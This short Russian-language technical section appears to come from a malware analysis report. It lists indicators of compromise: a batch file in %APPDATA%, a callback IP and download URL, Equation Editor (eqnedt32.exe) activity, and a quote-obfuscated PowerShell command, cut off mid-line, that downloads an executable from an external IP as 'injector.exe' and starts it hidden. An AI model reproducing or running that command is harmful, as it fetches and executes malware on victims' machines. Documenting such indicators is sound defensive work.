Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c ""%APPDATA%\cmd.bat" "
- %APPDATA%\cmd.bat
- '23.##.239.93':80
- http://23.##.239.93/3855/wln/cmd.bat
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NoP"r"o"f"ile -Executi"o"nPolic"y" Bypass -W"i"ndowStyle Hidden -C"o"mmand "I"nv"o"ke-WebReq"u"est http://23.94.239.93/3855/wln/Luliohnsa.exe -"O"ut"fi"le in"j"ector.exe; St"art-Process in"j"e...